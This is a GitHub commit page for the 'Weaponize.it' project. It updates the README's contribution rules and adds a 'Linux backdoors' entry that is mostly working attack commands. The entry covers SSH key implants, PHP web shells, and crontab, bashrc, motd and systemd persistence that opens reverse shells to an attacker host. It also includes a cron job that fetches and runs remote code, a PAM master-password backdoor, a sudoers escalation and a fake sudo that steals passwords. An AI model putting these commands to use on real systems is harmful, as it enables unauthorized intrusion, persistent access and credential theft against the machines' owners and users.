Skip to content

Commit

Permalink
added entry
Browse files Browse the repository at this point in the history
  • Loading branch information
Nicholas Ferreira committed Oct 24, 2023
1 parent 04f2b1b commit e150eb7
Show file tree
Hide file tree
Showing 2 changed files with 135 additions and 8 deletions.
17 changes: 9 additions & 8 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ Each toml file in the entries folder corresponds to an entry on Weaponize.it. Th
title = "Title of the entry"
description = "Brief description of the entry"
tags = ["tag1", "tag2"]
source = "https://example.com/source.html"
source = ["https://example.com/source.html"]

[[data]]
description = "Description about the command below"
Expand All @@ -33,13 +33,14 @@ command = """echo 'the command itself'"""
3. When adding a source, make sure the field `source` is composed of valid URLs.
4. Keep the `title` and `description` and the toml filename concise for clarity and brevity.
5. The toml filename should have underscores (_) as spaces.
6. Consider existing `tags` when selecting appropriate tags for your submission.
7. Utilize multiple `[[data]]` fields if you have more than one command to share.
8. The `language` field should either be left empty or contain a language supported by [highlight.js](https://highlightjs.org/download).
9. The `command` field is capable of multiline entries for comprehensive detailing.
10. Characters in the `command` field do not require escaping.
11. The contents of the submitted file can be modified before being approved.
12. Check the already existing [entries](/entries) and use them as template if needed.
6. The timestamp at the beginning of the filename is added automatically.
7. Consider existing `tags` when selecting appropriate tags for your submission.
8. Utilize multiple `[[data]]` fields if you have more than one command to share.
9. The `language` field should either be left empty or contain a language supported by [highlight.js](https://highlightjs.org/download).
10. The `command` field is capable of multiline entries for comprehensive detailing.
11. Characters in the `command` field do not require escaping.
12. The contents of the submitted file can be modified before being approved.
13. Check the already existing [entries](/entries) and use them as template if needed.

# Run Weaponize.it locally
```
Expand Down
126 changes: 126 additions & 0 deletions entries/linux_backdoors.toml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@
title = "Linux backdoors"
description = "What to do to backdoor a linux machine once you got access to it"
tags = ["linux", "backdoor", "php", "ssh", ]
source = ["https://airman604.medium.com/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c","http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html","https://tryhackme.com/room/linuxbackdoors", "https://gist.github.com/hoefler02/2ca8166c167f147c8fb076b48eb7cb47", "https://r.0x7359.com/", "https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9", "https://hosakacorp.net/p/systemd-user.html", "https://gist.github.com/ahhh/1d4bf832c5a88cc75adb"]

[[data]]
description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file."
language = "bash"
command = """#On your machine:
ssh-keygen -f ./backdoor
cat backdoor.pub #Copy the public key
#On the compromised machine (substitute <public key>):
echo '<public key>' >> ~/.ssh/authorized_keys
#Connect to the compromised machine with
ssh compromised-user@machine-ip -i backdoor"""

[[data]]
description = """Web PHP backdoor.
Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):"""
language = "php"
command = """<?php shell_exec($_REQUEST['x']);"""

[[data]]
description = "Web PHP backdoor (even stealthier):"
language = "php"
command = """#Run commands with
# curl -H "x:ls -la" example.com/backdoor.php
# curl -H "x:cat /etc/passwd" example.com/backdoor.php
<?php echo shell_exec($_SERVER['HTTP_X']);?>"""

[[data]]
description = "Tiniest PHP backdoor possible:"
language = "php"
command = """#Run commands with example.com/backdoor.php?0=ls -la
<?=`$_GET[0]`?>"""

[[data]]
description = "Crontab backdoor keeping existing crontabs (substitute <ATTACKER IP> and <PORT>):"
language = "bash"
command = """(crontab -l > .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Crontab backdoor overwriting existing crontabs:"
language = "bash"
command = """(touch .tab ; echo "* * * * * 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Example sending bash reverse shell every 5 min:"
language = "bash"
command = """(touch .tab ; echo "*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/<ATTACKER ip>/<PORT> 0>&1'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = """Running arbitrary commands every minute with cron via http.
Set up a webserver and create a file named 'run'. Put on it the commands you want to run on the compromised machine."""
language = "bash"
command = """(crontab -l > .tab ; echo "* * * * * 'curl https://<ATTACKER IP>/run | sh'" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"""

[[data]]
description = "Bashrc backdoor. Will run everytime a new terminal session is started:"
language = "bash"
command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f' >> ~/.bashrc"""

[[data]]
description = "PAM backdoor to log in into any user (root required):"
language = "bash"
command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc
git clone https://github.com/zephrax/linux-pam-backdoor
#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases)
./backdoor.sh -v 1.4.0 -p passw0rd
#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine.
#Now log in into any user using the password 'passw0rd'."""

[[data]]
description = "Add your unprivileged user to sudoers (substitute <USER>) (root required)"
language = "bash"
command = """echo '<USER> ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers"""

[[data]]
description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH:"
language = "bash"
command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <PORT> >/tmp/f &' > 20-backdoor && chmod +x 20-backdoor"""

[[data]]
description = "Backdooring systemd services. Change <ATTACKER IP> and <ATTACKER PORT> and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:"
language = "ini"
command = """#!/bin/sh
IP="<ATTACKER IP>"
PORT="<ATTACKER PORT>"
SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/"
W_PATH=""
UNIT="voodoo.service"
UNIT_CONTENT="[Unit]
Description=Black magic happening, avert your eyes
[Service]
RemainAfterExit=yes
Type=simple
ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\"
[Install]
WantedBy=default.target"
for i in $SYSTEMD_PATH; do
mkdir -p "$i"
if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi
done
for k in $W_PATH; do
echo "$UNIT_CONTENT" > "$k/$UNIT"
echo "[*] created voodoo in '$k/$UNIT"
done
systemctl --user daemon-reload
systemctl --user restart $UNIT > /dev/null
systemctl --user enable $UNIT"""

[[data]]
description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:"
language = "bash"
command = """#Change /tmp/sudo if needed
wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo
chmod +x /tmp/sudo
echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc"""

0 comments on commit e150eb7

Please sign in to comment.